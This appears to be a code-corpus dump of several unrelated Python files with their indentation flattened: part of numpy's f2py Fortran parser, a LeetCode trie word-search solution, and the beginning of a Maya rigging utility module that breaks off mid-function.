params = get_parameters(vars, get_useparameters(block))
dep_matches = {}
name_match = re.compile(r'\w[\w\d_$]*').match
for v in list(vars.keys()):
m = name_match(v)
if m:
n = v[m.start():m.end()]
try:
dep_matches[n]
except KeyError:
dep_matches[n] = re.compile(r'.*\b%s\b' % (v), re.I).match
for n in svars:
if n[0] in list(attrrules.keys()):
vars[n] = setattrspec(vars[n], attrrules[n[0]])
if 'typespec' not in vars[n]:
if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']):
if implicitrules:
ln0 = n[0].lower()
for k in list(implicitrules[ln0].keys()):
if k == 'typespec' and implicitrules[ln0][k] == 'undefined':
continue
if k not in vars[n]:
vars[n][k] = implicitrules[ln0][k]
elif k == 'attrspec':
for l in implicitrules[ln0][k]:
vars[n] = setattrspec(vars[n], l)
elif n in block['args']:
outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n' % (
repr(n), block['name']))
if 'charselector' in vars[n]:
if 'len' in vars[n]['charselector']:
l = vars[n]['charselector']['len']
try:
l = str(eval(l, {}, params))
except Exception:
pass
vars[n]['charselector']['len'] = l
if 'kindselector' in vars[n]:
if 'kind' in vars[n]['kindselector']:
l = vars[n]['kindselector']['kind']
try:
l = str(eval(l, {}, params))
except Exception:
pass
vars[n]['kindselector']['kind'] = l
savelindims = {}
if 'attrspec' in vars[n]:
attr = vars[n]['attrspec']
attr.reverse()
vars[n]['attrspec'] = []
dim, intent, depend, check, note = None, None, None, None, None
for a in attr:
if a[:9] == 'dimension':
dim = (a[9:].strip())[1:-1]
elif a[:6] == 'intent':
intent = (a[6:].strip())[1:-1]
elif a[:6] == 'depend':
depend = (a[6:].strip())[1:-1]
elif a[:5] == 'check':
check = (a[5:].strip())[1:-1]
elif a[:4] == 'note':
note = (a[4:].strip())[1:-1]
else:
vars[n] = setattrspec(vars[n], a)
if intent:
if 'intent' not in vars[n]:
vars[n]['intent'] = []
for c in [x.strip() for x in markoutercomma(intent).split('@,@')]:
# Remove spaces so that 'in out' becomes 'inout'
tmp = c.replace(' ', '')
if tmp not in vars[n]['intent']:
vars[n]['intent'].append(tmp)
intent = None
if note:
note = note.replace('\\n\\n', '\n\n')
note = note.replace('\\n ', '\n')
if 'note' not in vars[n]:
vars[n]['note'] = [note]
else:
vars[n]['note'].append(note)
note = None
if depend is not None:
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]):
if c not in vars[n]['depend']:
vars[n]['depend'].append(c)
depend = None
if check is not None:
if 'check' not in vars[n]:
vars[n]['check'] = []
for c in [x.strip() for x in markoutercomma(check).split('@,@')]:
if c not in vars[n]['check']:
vars[n]['check'].append(c)
check = None
if dim and 'dimension' not in vars[n]:
vars[n]['dimension'] = []
for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]):
star = '*'
if d == ':':
star = ':'
if d in params:
d = str(params[d])
for p in list(params.keys()):
re_1 = re.compile(r'(?P<before>.*?)\b' + p + r'\b(?P<after>.*)', re.I)
m = re_1.match(d)
while m:
d = m.group('before') + \
str(params[p]) + m.group('after')
m = re_1.match(d)
if d == star:
dl = [star]
else:
dl = markoutercomma(d, ':').split('@:@')
if len(dl) == 2 and '*' in dl: # e.g. dimension(5:*)
dl = ['*']
d = '*'
if len(dl) == 1 and not dl[0] == star:
dl = ['1', dl[0]]
if len(dl) == 2:
d, v, di = getarrlen(dl, list(block['vars'].keys()))
if d[:4] == '1 * ':
d = d[4:]
if di and di[-4:] == '/(1)':
di = di[:-4]
if v:
savelindims[d] = v, di
vars[n]['dimension'].append(d)
if 'dimension' in vars[n]:
if isintent_c(vars[n]):
shape_macro = 'shape'
else:
shape_macro = 'shape' # 'fshape'
if isstringarray(vars[n]):
if 'charselector' in vars[n]:
d = vars[n]['charselector']
if '*' in d:
d = d['*']
errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n'
% (d, n,
','.join(vars[n]['dimension']),
n, ','.join(vars[n]['dimension'] + [d])))
vars[n]['dimension'].append(d)
del vars[n]['charselector']
if 'intent' not in vars[n]:
vars[n]['intent'] = []
if 'c' not in vars[n]['intent']:
vars[n]['intent'].append('c')
else:
errmess(
"analyzevars: charselector=%r unhandled." % (d))
if 'check' not in vars[n] and 'args' in block and n in block['args']:
flag = 'depend' not in vars[n]
if flag:
vars[n]['depend'] = []
vars[n]['check'] = []
if 'dimension' in vars[n]:
#/----< no check
i = -1
ni = len(vars[n]['dimension'])
for d in vars[n]['dimension']:
ddeps = [] # dependencies of 'd'
ad = ''
pd = ''
if d not in vars:
if d in savelindims:
pd, ad = '(', savelindims[d][1]
d = savelindims[d][0]
else:
for r in block['args']:
if r not in vars:
continue
if re.match(r'.*?\b' + r + r'\b', d, re.I):
ddeps.append(r)
if d in vars:
if 'attrspec' in vars[d]:
for aa in vars[d]['attrspec']:
if aa[:6] == 'depend':
ddeps += aa[6:].strip()[1:-1].split(',')
if 'depend' in vars[d]:
ddeps = ddeps + vars[d]['depend']
i = i + 1
if d in vars and ('depend' not in vars[d]) \
and ('=' not in vars[d]) and (d not in vars[n]['depend']) \
and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]):
vars[d]['depend'] = [n]
if ni > 1:
vars[d]['='] = '%s%s(%s,%s)%s' % (
pd, shape_macro, n, i, ad)
else:
vars[d]['='] = '%slen(%s)%s' % (pd, n, ad)
# /---< no check
if 1 and 'check' not in vars[d]:
if ni > 1:
vars[d]['check'] = ['%s%s(%s,%i)%s==%s'
% (pd, shape_macro, n, i, ad, d)]
else:
vars[d]['check'] = [
'%slen(%s)%s>=%s' % (pd, n, ad, d)]
if 'attrspec' not in vars[d]:
vars[d]['attrspec'] = ['optional']
if ('optional' not in vars[d]['attrspec']) and\
('required' not in vars[d]['attrspec']):
vars[d]['attrspec'].append('optional')
elif d not in ['*', ':']:
#/----< no check
if flag:
if d in vars:
if n not in ddeps:
vars[n]['depend'].append(d)
else:
vars[n]['depend'] = vars[n]['depend'] + ddeps
elif isstring(vars[n]):
length = '1'
if 'charselector' in vars[n]:
if '*' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['*'],
params)
vars[n]['charselector']['*'] = length
elif 'len' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['len'],
params)
del vars[n]['charselector']['len']
vars[n]['charselector']['*'] = length
if not vars[n]['check']:
del vars[n]['check']
if flag and not vars[n]['depend']:
del vars[n]['depend']
if '=' in vars[n]:
if 'attrspec' not in vars[n]:
vars[n]['attrspec'] = []
if ('optional' not in vars[n]['attrspec']) and \
('required' not in vars[n]['attrspec']):
vars[n]['attrspec'].append('optional')
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for v, m in list(dep_matches.items()):
if m(vars[n]['=']):
vars[n]['depend'].append(v)
if not vars[n]['depend']:
del vars[n]['depend']
if isscalar(vars[n]):
vars[n]['='] = _eval_scalar(vars[n]['='], params)
for n in list(vars.keys()):
if n == block['name']: # n is block name
if 'note' in vars[n]:
block['note'] = vars[n]['note']
if block['block'] == 'function':
if 'result' in block and block['result'] in vars:
vars[n] = appenddecl(vars[n], vars[block['result']])
if 'prefix' in block:
pr = block['prefix']
ispure = 0
isrec = 1
pr1 = pr.replace('pure', '')
ispure = (not pr == pr1)
pr = pr1.replace('recursive', '')
isrec = (not pr == pr1)
m = typespattern[0].match(pr)
if m:
typespec, selector, attr, edecl = cracktypespec0(
m.group('this'), m.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
vars[n]['typespec'] = typespec
if kindselect:
if 'kind' in kindselect:
try:
kindselect['kind'] = eval(
kindselect['kind'], {}, params)
except Exception:
pass
vars[n]['kindselector'] = kindselect
if charselect:
vars[n]['charselector'] = charselect
if typename:
vars[n]['typename'] = typename
if ispure:
vars[n] = setattrspec(vars[n], 'pure')
if isrec:
vars[n] = setattrspec(vars[n], 'recursive')
else:
outmess(
'analyzevars: prefix (%s) were not used\n' % repr(block['prefix']))
if not block['block'] in ['module', 'pythonmodule', 'python module', 'block data']:
if 'commonvars' in block:
neededvars = copy.copy(block['args'] + block['commonvars'])
else:
neededvars = copy.copy(block['args'])
for n in list(vars.keys()):
if l_or(isintent_callback, isintent_aux)(vars[n]):
neededvars.append(n)
if 'entry' in block:
neededvars.extend(list(block['entry'].keys()))
for k in list(block['entry'].keys()):
for n in block['entry'][k]:
if n not in neededvars:
neededvars.append(n)
if block['block'] == 'function':
if 'result' in block:
neededvars.append(block['result'])
else:
neededvars.append(block['name'])
if block['block'] in ['subroutine', 'function']:
name = block['name']
if name in vars and 'intent' in vars[name]:
block['intent'] = vars[name]['intent']
if block['block'] == 'type':
neededvars.extend(list(vars.keys()))
for n in list(vars.keys()):
if n not in neededvars:
del vars[n]
return vars
analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z', re.I)
def expr2name(a, block, args=[]):
orig_a = a
a_is_expr = not analyzeargs_re_1.match(a)
if a_is_expr: # `a` is an expression
implicitrules, attrrules = buildimplicitrules(block)
at = determineexprtype(a, block['vars'], implicitrules)
na = 'e_'
for c in a:
c = c.lower()
if c not in string.ascii_lowercase + string.digits:
c = '_'
na = na + c
if na[-1] == '_':
na = na + 'e'
else:
na = na + '_e'
a = na
while a in block['vars'] or a in block['args']:
a = a + 'r'
if a in args:
k = 1
while a + str(k) in args:
k = k + 1
a = a + str(k)
if a_is_expr:
block['vars'][a] = at
else:
if a not in block['vars']:
if orig_a in block['vars']:
block['vars'][a] = block['vars'][orig_a]
else:
block['vars'][a] = {}
if 'externals' in block and orig_a in block['externals'] + block['interfaced']:
block['vars'][a] = setattrspec(block['vars'][a], 'external')
return a
def analyzeargs(block):
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
if 'args' not in block:
block['args'] = []
args = []
for a in block['args']:
a = expr2name(a, block, args)
args.append(a)
block['args'] = args
if 'entry' in block:
for k, args1 in list(block['entry'].items()):
for a in args1:
if a not in block['vars']:
block['vars'][a] = {}
for b in block['body']:
if b['name'] in args:
if 'externals' not in block:
block['externals'] = []
if b['name'] not in block['externals']:
block['externals'].append(b['name'])
if 'result' in block and block['result'] not in block['vars']:
block['vars'][block['result']] = {}
return block
determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z', re.I)
determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(?P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_3 = re.compile(
r'\A[+-]?[\d.]+[\d+\-de.]*(_(?P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z', re.I)
determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z', re.I)
def _ensure_exprdict(r):
if isinstance(r, int):
return {'typespec': 'integer'}
if isinstance(r, float):
return {'typespec': 'real'}
if isinstance(r, complex):
return {'typespec': 'complex'}
if isinstance(r, dict):
return r
raise AssertionError(repr(r))
def determineexprtype(expr, vars, rules={}):
if expr in vars:
return _ensure_exprdict(vars[expr])
expr = expr.strip()
if determineexprtype_re_1.match(expr):
return {'typespec': 'complex'}
m = determineexprtype_re_2.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'integer'}
m = determineexprtype_re_3.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'real'}
for op in ['+', '-', '*', '/']:
for e in [x.strip() for x in markoutercomma(expr, comma=op).split('@' + op + '@')]:
if e in vars:
return _ensure_exprdict(vars[e])
t = {}
if determineexprtype_re_4.match(expr): # in parenthesis
t = determineexprtype(expr[1:-1], vars, rules)
else:
m = determineexprtype_re_5.match(expr)
if m:
rn = m.group('name')
t = determineexprtype(m.group('name'), vars, rules)
if t and 'attrspec' in t:
del t['attrspec']
if not t:
if rn[0] in rules:
return _ensure_exprdict(rules[rn[0]])
if expr[0] in '\'"':
return {'typespec': 'character', 'charselector': {'*': '*'}}
if not t:
outmess(
'determineexprtype: could not determine expressions (%s) type.\n' % (repr(expr)))
return t
######
def crack2fortrangen(block, tab='\n', as_interface=False):
global skipfuncs, onlyfuncs
setmesstext(block)
ret = ''
if isinstance(block, list):
for g in block:
if g and g['block'] in ['function', 'subroutine']:
if g['name'] in skipfuncs:
continue
if onlyfuncs and g['name'] not in onlyfuncs:
continue
ret = ret + crack2fortrangen(g, tab, as_interface=as_interface)
return ret
prefix = ''
name = ''
args = ''
blocktype = block['block']
if blocktype == 'program':
return ''
argsl = []
if 'name' in block:
name = block['name']
if 'args' in block:
vars = block['vars']
for a in block['args']:
a = expr2name(a, block, argsl)
if not isintent_callback(vars[a]):
argsl.append(a)
if block['block'] == 'function' or argsl:
args = '(%s)' % ','.join(argsl)
f2pyenhancements = ''
if 'f2pyenhancements' in block:
for k in list(block['f2pyenhancements'].keys()):
f2pyenhancements = '%s%s%s %s' % (
f2pyenhancements, tab + tabchar, k, block['f2pyenhancements'][k])
intent_lst = block.get('intent', [])[:]
if blocktype == 'function' and 'callback' in intent_lst:
intent_lst.remove('callback')
if intent_lst:
f2pyenhancements = '%s%sintent(%s) %s' %\
(f2pyenhancements, tab + tabchar,
','.join(intent_lst), name)
use = ''
if 'use' in block:
use = use2fortran(block['use'], tab + tabchar)
common = ''
if 'common' in block:
common = common2fortran(block['common'], tab + tabchar)
if name == 'unknown_interface':
name = ''
result = ''
if 'result' in block:
result = ' result (%s)' % block['result']
if block['result'] not in argsl:
argsl.append(block['result'])
body = crack2fortrangen(block['body'], tab + tabchar)
vars = vars2fortran(
block, block['vars'], argsl, tab + tabchar, as_interface=as_interface)
mess = ''
if 'from' in block and not as_interface:
mess = '! in %s' % block['from']
if 'entry' in block:
entry_stmts = ''
for k, i in list(block['entry'].items()):
entry_stmts = '%s%sentry %s(%s)' \
% (entry_stmts, tab + tabchar, k, ','.join(i))
body = body + entry_stmts
if blocktype == 'block data' and name == '_BLOCK_DATA_':
name = ''
ret = '%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s' % (
tab, prefix, blocktype, name, args, result, mess, f2pyenhancements, use, vars, common, body, tab, blocktype, name)
return ret
def common2fortran(common, tab=''):
ret = ''
for k in list(common.keys()):
if k == '_BLNK_':
ret = '%s%scommon %s' % (ret, tab, ','.join(common[k]))
else:
ret = '%s%scommon /%s/ %s' % (ret, tab, k, ','.join(common[k]))
return ret
def use2fortran(use, tab=''):
ret = ''
for m in list(use.keys()):
ret = '%s%suse %s,' % (ret, tab, m)
if use[m] == {}:
if ret and ret[-1] == ',':
ret = ret[:-1]
continue
if 'only' in use[m] and use[m]['only']:
ret = '%s only:' % (ret)
if 'map' in use[m] and use[m]['map']:
c = ' '
for k in list(use[m]['map'].keys()):
if k == use[m]['map'][k]:
ret = '%s%s%s' % (ret, c, k)
c = ','
else:
ret = '%s%s%s=>%s' % (ret, c, k, use[m]['map'][k])
c = ','
if ret and ret[-1] == ',':
ret = ret[:-1]
return ret
def true_intent_list(var):
lst = var['intent']
ret = []
for intent in lst:
try:
f = globals()['isintent_%s' % intent]
except KeyError:
pass
else:
if f(var):
ret.append(intent)
return ret
def vars2fortran(block, vars, args, tab='', as_interface=False):
"""
TODO:
public sub
...
"""
setmesstext(block)
ret = ''
nout = []
for a in args:
if a in block['vars']:
nout.append(a)
if 'commonvars' in block:
for a in block['commonvars']:
if a in vars:
if a not in nout:
nout.append(a)
else:
errmess(
'vars2fortran: Confused?!: "%s" is not defined in vars.\n' % a)
if 'varnames' in block:
nout.extend(block['varnames'])
if not as_interface:
for a in list(vars.keys()):
if a not in nout:
nout.append(a)
for a in nout:
if 'depend' in vars[a]:
for d in vars[a]['depend']:
if d in vars and 'depend' in vars[d] and a in vars[d]['depend']:
errmess(
'vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n' % (a, d))
if 'externals' in block and a in block['externals']:
if isintent_callback(vars[a]):
ret = '%s%sintent(callback) %s' % (ret, tab, a)
ret = '%s%sexternal %s' % (ret, tab, a)
if isoptional(vars[a]):
ret = '%s%soptional %s' % (ret, tab, a)
if a in vars and 'typespec' not in vars[a]:
continue
cont = 1
for b in block['body']:
if a == b['name'] and b['block'] == 'function':
cont = 0
break
if cont:
continue
if a not in vars:
show(vars)
outmess('vars2fortran: No definition for argument "%s".\n' % a)
continue
if a == block['name'] and not block['block'] == 'function':
continue
if 'typespec' not in vars[a]:
if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']:
if a in args:
ret = '%s%sexternal %s' % (ret, tab, a)
continue
show(vars[a])
outmess('vars2fortran: No typespec for argument "%s".\n' % a)
continue
vardef = vars[a]['typespec']
if vardef == 'type' and 'typename' in vars[a]:
vardef = '%s(%s)' % (vardef, vars[a]['typename'])
selector = {}
if 'kindselector' in vars[a]:
selector = vars[a]['kindselector']
elif 'charselector' in vars[a]:
selector = vars[a]['charselector']
if '*' in selector:
if selector['*'] in ['*', ':']:
vardef = '%s*(%s)' % (vardef, selector['*'])
else:
vardef = '%s*%s' % (vardef, selector['*'])
else:
if 'len' in selector:
vardef = '%s(len=%s' % (vardef, selector['len'])
if 'kind' in selector:
vardef = '%s,kind=%s)' % (vardef, selector['kind'])
else:
vardef = '%s)' % (vardef)
elif 'kind' in selector:
vardef = '%s(kind=%s)' % (vardef, selector['kind'])
c = ' '
if 'attrspec' in vars[a]:
attr = [l for l in vars[a]['attrspec']
if l not in ['external']]
if attr:
vardef = '%s, %s' % (vardef, ','.join(attr))
c = ','
if 'dimension' in vars[a]:
vardef = '%s%sdimension(%s)' % (
vardef, c, ','.join(vars[a]['dimension']))
c = ','
if 'intent' in vars[a]:
lst = true_intent_list(vars[a])
if lst:
vardef = '%s%sintent(%s)' % (vardef, c, ','.join(lst))
c = ','
if 'check' in vars[a]:
vardef = '%s%scheck(%s)' % (vardef, c, ','.join(vars[a]['check']))
c = ','
if 'depend' in vars[a]:
vardef = '%s%sdepend(%s)' % (
vardef, c, ','.join(vars[a]['depend']))
c = ','
if '=' in vars[a]:
v = vars[a]['=']
if vars[a]['typespec'] in ['complex', 'double complex']:
try:
v = eval(v)
v = '(%s,%s)' % (v.real, v.imag)
except Exception:
pass
vardef = '%s :: %s=%s' % (vardef, a, v)
else:
vardef = '%s :: %s' % (vardef, a)
ret = '%s%s%s' % (ret, tab, vardef)
return ret
######
def crackfortran(files):
global usermodules
outmess('Reading fortran codes...\n', 0)
readfortrancode(files, crackline)
outmess('Post-processing...\n', 0)
usermodules = []
postlist = postcrack(grouplist[0])
outmess('Post-processing (stage 2)...\n', 0)
postlist = postcrack2(postlist)
return usermodules + postlist
def crack2fortran(block):
global f2py_version
pyf = crack2fortrangen(block) + '\n'
header = """! -*- f90 -*-
! Note: the context of this file is case sensitive.
"""
footer = """
! This file was auto-generated with f2py (version:%s).
! See http://cens.ioc.ee/projects/f2py2e/
""" % (f2py_version)
return header + pyf + footer
if __name__ == "__main__":
files = []
funcs = []
f = 1
f2 = 0
f3 = 0
showblocklist = 0
for l in sys.argv[1:]:
if l == '':
pass
elif l[0] == ':':
f = 0
elif l == '-quiet':
quiet = 1
verbose = 0
elif l == '-verbose':
verbose = 2
quiet = 0
elif l == '-fix':
if strictf77:
outmess(
'Use option -f90 before -fix if Fortran 90 code is in fix form.\n', 0)
skipemptyends = 1
sourcecodeform = 'fix'
elif l == '-skipemptyends':
skipemptyends = 1
elif l == '--ignore-contains':
ignorecontains = 1
elif l == '-f77':
strictf77 = 1
sourcecodeform = 'fix'
elif l == '-f90':
strictf77 = 0
sourcecodeform = 'free'
skipemptyends = 1
elif l == '-h':
f2 = 1
elif l == '-show':
showblocklist = 1
elif l == '-m':
f3 = 1
elif l[0] == '-':
errmess('Unknown option %s\n' % repr(l))
elif f2:
f2 = 0
pyffilename = l
elif f3:
f3 = 0
f77modulename = l
elif f:
try:
open(l).close()
files.append(l)
except IOError as detail:
errmess('IOError: %s\n' % str(detail))
else:
funcs.append(l)
if not strictf77 and f77modulename and not skipemptyends:
outmess("""\
Warning: You have specified module name for non Fortran 77 code
that should not need one (expect if you are scanning F90 code
for non module blocks but then you should use flag -skipemptyends
and also be sure that the files do not contain programs without program statement).
""", 0)
postlist = crackfortran(files)
if pyffilename:
outmess('Writing fortran code to file %s\n' % repr(pyffilename), 0)
pyf = crack2fortran(postlist)
with open(pyffilename, 'w') as f:
f.write(pyf)
if showblocklist:
show(postlist)
| bsd-3-clause | 7,846,563,131,492,437,000 | 37.362383 | 207 | 0.469806 | false |
guozengxin/myleetcode | python/wordSearchII.py | 1 | 2827 | # https://leetcode.com/problems/word-search-ii/
class Solution(object):
def findWords(self, board, words):
"""
:type board: List[List[str]]
:type words: List[str]
:rtype: List[str]
"""
trie = Trie()
for w in words:
trie.insert(w)
res = set()
for i in xrange(len(board)):
for j in xrange(len(board[i])):
visited = set()
self.dfs(board, trie.root, i, j, visited, res)
return list(res)
def dfs(self, board, trieNode, i, j, visited, res):
if (i, j) in visited:
return
if (i < 0 or j < 0 or i >= len(board) or j >= len(board[i])):
return
cur = board[i][j]
if cur in trieNode.nodes:
if trieNode.nodes[cur].isLeaf:
res.add(trieNode.nodes[cur].word)
visited.add((i, j))
self.dfs(board, trieNode.nodes[cur], i+1, j, visited, res)
self.dfs(board, trieNode.nodes[cur], i, j+1, visited, res)
self.dfs(board, trieNode.nodes[cur], i-1, j, visited, res)
self.dfs(board, trieNode.nodes[cur], i, j-1, visited, res)
visited.remove((i, j))
class TrieNode(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.nodes = {}
self.word = ''
self.isLeaf = False
class Trie(object):
def __init__(self):
self.root = TrieNode()
def insert(self, word):
"""
Inserts a word into the trie.
:type word: str
:rtype: void
"""
node = self.root
for c in word:
if c in node.nodes:
node = node.nodes[c]
else:
newNode = TrieNode()
node.nodes[c] = newNode
node = newNode
node.isLeaf = True
node.word = word
def search(self, word):
"""
Returns if the word is in the trie.
:type word: str
:rtype: bool
"""
node = self.root
for c in word:
if c in node.nodes:
node = node.nodes[c]
else:
return False
return node.isLeaf
def startsWith(self, prefix):
"""
Returns if there is any word in the trie
that starts with the given prefix.
:type prefix: str
:rtype: bool
"""
node = self.root
for c in prefix:
if c in node.nodes:
node = node.nodes[c]
else:
return False
return True
board = [
['o','a','a','n'],
['e','t','a','e'],
['i','h','k','r'],
['i','f','l','v']
]
words = ["oath","pea","eat","rain"]
s = Solution()
print s.findWords(board, words) | mit | 7,831,944,678,315,443,000 | 24.25 | 70 | 0.474708 | false |
Leopardob/Kistie | kcode/kcore/KstMaya.py | 1 | 28693 | '''
K.I.S.T.I.E (Keep, It, Simple, Take, It, Easy)
Created on 1 Jan 2013
@author: Leonardo Bruni, [email protected]
Kistie Maya Module Library
This Kistie implementation i's part of project 'Kistie_Autorig' by Leonardo Bruni, [email protected]
'''
#ToDo: implement a debug mode for print or not
import pymel as pm # import pymel lib
import maya.cmds as cmds # import maya cmds lib
import maya.mel as mel # import maya mel lib
import maya.OpenMaya as om
# Import kstCore
import kcode.kcore.KstCore as _KstCore_
reload(_KstCore_)
KstCore = _KstCore_.KstCore()
# Import kstMath
import kcode.kmath.KstMath as _KstMath_
reload(_KstMath_)
KstMath = _KstMath_.KstMath()
# Import KstOut
import kcode.kcore.KstOut as _KstOut_
reload(_KstOut_)
KstOut = _KstOut_.KstOut()
class KstMaya(object):
# Debug module name variable
_debug = 'KstMaya'
def __init__(self):
KstOut.debug('Kistie Maya function module loaded... ')
# Channels Operation method
def channels_op(self, selections, channels_list, *args):
'''
Desc:
Make operation on channels
Parameter:
selections = list of selection where perform operations
*args = type of operation (lock, hide)
channels_list = list of channels to perform operations
Return void
Example:
KstMaya.channels_op(['selection'], ['ch','ch','ch'], 'lock=Bool', 'keyable=Bool', 'channelBox=Bool')
'''
# Declare variable for errors
errors_list = []
# Check if selections type input is valid
if not type(selections) is list:
KstOut.debug(KstMaya._debug, 'selections must be a list!')
errors_list.append('selections')
# Check if channels_list input is valid
if not type(channels_list) is list:
KstOut.debug(KstMaya._debug, 'channels_list must be a list!')
errors_list.append('channels')
try:
# If there are no errors go
if len(errors_list) == 0:
# Create empty value for python command
cmd = ''
for sel in selections:
for ch in channels_list:
for count, arg in enumerate(args):
# Build string command
cmd = "cmds.setAttr('%s.%s', %s)" % (sel, ch, arg)
# Execute string command // ToDo, build a Kistie class for this
exec(cmd)
# Debug command
KstOut.debug(KstMaya._debug, cmd)
# Otherwise stop and release errorsList
else:
KstOut.debug(KstMaya._debug, 'You have some errors: ', errors_list)
except:
KstOut.error(KstMaya._debug, 'Error found!!! '+str(errors_list))
@staticmethod
# Get Shape method
def get_shape_node(transform):
'''
Desc:
return a shape from a transform
Parameter:
transform = transform node that you want get the shape
Return:
Shape obj from the transform
'''
shape_list = cmds.listRelatives(transform, s=True)
if shape_list:
shape = shape_list[0]
return shape
else:
#KstOut.debug(self._debug_msg, 'No shapes found in current transform, double check')
return None
# Get Transform method
def get_transform_node(self, shape):
'''
Desc:
return a transform from a shape
Parameter:
shape = shape node that you want get the transform
Return:
Transform obj from the shape
'''
try:
transform_list = cmds.listRelatives(shape, p=True)
if transform_list:
transform = transform_list[0]
return transform
except:
KstOut.debug(KstMaya._debug, 'No transform found in current shape, double check')
pass
# Get Parent method
@staticmethod
def get_his_parent(obj):
'''
Desc:
return parent from an object
Parameter:
obj = object to get the parent
Return:
Parent object
'''
try:
parent = cmds.listRelatives(obj, p=True)
if parent:
return parent
except:
KstOut.debug(KstMaya._debug, 'No parent object found, double check')
pass
# Get Parent method
@staticmethod
def get_his_child(obj):
'''
Desc:
return child from an object
Parameter:
obj = object to get the child
Return:
Parent object
'''
try:
child = cmds.listRelatives(obj, c=True)
if child:
return child
except:
KstOut.debug(KstMaya._debug, 'No child object found, double check')
pass
# Get all input type (nodeType) nodes in scene
def get_node_type(self, node_type):
'''
Desc:
return a list of node founded from nodeType parameter
Parameter:
node_type = nodes type to find
Return:
a list with node of that type defined in input
'''
node_list = cmds.ls(type=node_type)
found_nodes = []
if node_list:
KstOut.debug(KstMaya._debug, str(node_type)+' nodes list: ')
for node in node_list:
KstOut.debug(KstMaya._debug, 'nodetype = '+str(node_type)+'-> '+str(node))
found_nodes.append(node)
else:
KstOut.debug(KstMaya._debug, 'nodetype "'+str(node_type)+'" not exists!')
return found_nodes
# Get all input name (nodeName) nodes in scene
def get_node_if_name_contains(self, node_name):
'''
Desc:
return a list of node founded from nodeName parameter
Parameter:
node_name = nodes name to find
Return:
a list with node of that contains name defined in input
'''
node_list = cmds.ls()
found_nodes = []
if node_list:
for node in node_list:
if node_name in node:
KstOut.debug(KstMaya._debug, '-> '+str(node))
found_nodes.append(node)
else:
KstOut.debug(KstMaya._debug, str(node_name)+' not exists')
return found_nodes
# Make a copy of the inputObject
def duplicate_this(self, input_object, copy_name='cpy_'):
'''
Desc:
return a obj that is the copy of inputObject with a name defined in nameOfCopy
Parameter:
input_object = the object to be copied
copy_name = the copy name
Return:
the obj copied from the original with the new name
'''
if input_object:
#cmds.select(input_object)
copy_object = cmds.duplicate(input_object, smartTransform=True, name = copy_name, renameChildren = True)
copy_object[0] = cmds.rename(copy_object[0], copy_name+input_object)
#print('DEBUG copy object: ', copy_object)
# Search all children of the current object for renaming
hierarchy = cmds.listRelatives(copy_object, c=True)
if hierarchy:
for child in hierarchy:
cmds.rename(child, copy_name+child[:-1])
KstOut.debug(KstMaya._debug, str(copy_object[0])+" duplicated from "+str(input_object))
return copy_object
else:
KstOut.debug(KstMaya._debug, ' inputObject empty, check selection, or array')
# Make connection between two node with specified attributes ToDo: add code for test if connection is already in there or not, if it is force delete
def node_op(self, src, op, dst):
'''
Desc:
Make node operation between two object+attributes
Parameter:
src = source object and attr
op = operator:
this value can be
>> connect SRC to DST
<< connect DST to SRC
\\ disconnect SRC from DST
dst = destinatin object and attr
Return:
bool attribute, True if connection was done, otherwise in all others case False
'''
stat = False
if src and dst and op:
if op == '>>':
try:
cmds.connectAttr(src, dst, f=True)
stat = True
except:
KstOut.debug(KstMaya._debug, 'Error occurred making connection src, dst')
KstOut.debug(KstMaya._debug, 'DEBUG DATA: ')
KstOut.debug(KstMaya._debug, '%s = SOURCE' % src)
KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst)
KstOut.debug(KstMaya._debug, '-> END DATA')
print 'CANNOT ', src, dst
elif op == '<<':
try:
cmds.connectAttr(dst, src, f=True)
stat = True
except:
KstOut.debug(KstMaya._debug, 'Error occurred making connection dst, src')
KstOut.debug(KstMaya._debug,'DEBUG DATA: ')
KstOut.debug(KstMaya._debug, '%s = SOURCE' % src)
KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst)
KstOut.debug(KstMaya._debug, '-> END DATA')
# print ''
elif op == '||':
try:
cmds.disconnectAttr(src, dst, f=True)
stat = True
except:
KstOut.debug(KstMaya._debug, 'Error occurred in disconnection')
KstOut.debug(KstMaya._debug, 'DEBUG DATA: ')
KstOut.debug(KstMaya._debug, '%s = SOURCE' % src)
KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst)
KstOut.debug(KstMaya._debug, '-> END DATA')
# print ''
else:
KstOut.debug(KstMaya._debug, ' symbol not defined, you can use (>>, <<, ||)')
stat = False
return stat
else:
KstOut.debug(KstMaya._debug, ' double check inputs (source, operator, destination)')
KstOut.error(KstMaya._debug, ' double check inputs (source, operator, destination)')
return None
# Destroy all connections, finally works with keyframes and normal connections
def destroy_channels_connections(self, sel, channels_list):
'''
Desc:
Destroy connections for selected channels
sel = current object
*args = list of channels to disconnect in format [ch,ch,ch,...]
'''
for ch in channels_list:
